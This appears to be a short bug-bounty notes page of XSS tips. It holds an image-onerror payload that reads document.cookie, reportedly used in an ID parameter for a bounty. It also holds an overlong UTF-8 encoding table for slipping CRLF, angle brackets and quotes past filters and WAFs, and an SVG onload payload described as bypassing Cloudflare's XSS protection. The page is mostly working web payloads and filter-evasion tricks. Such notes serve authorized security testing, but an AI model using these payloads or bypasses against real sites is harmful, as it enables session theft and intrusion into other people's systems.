2023-09-21

xss

#xss

Step

xsshunter
id处 h"<img src=x onerror=alert(document.cookie)>
500💵

Bug Bounty Tips

#tips #bypass #xss #crlf

Step

Overlong UTF-8 encoding Attack

2-byte / 3-byte ⇒ original

C0%8A / %E0%80%8A ⇒ %0A
%C0%8D / %E0%80%8D ⇒ %0D
%C0%BE / %E0%80%BE ⇒ %3E (>)
%C0%BC / %E0%80%BC ⇒ %3C (<)
%C0%A2 / %E0%80%A2 ⇒ %22 (")
%C0%A7 / %E0%80%A7 ⇒ %27 (')

For XSS, CRLF, WAF bypass https://jsfiddle.net/bw1Lhxnt

Cloudflare XSS protection bypass

#bypass #xss #Cloudflare

Step

"&gt;&lt;Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))&gt;

PreviousXSS Next漏洞挖掘

Last updated 1 year ago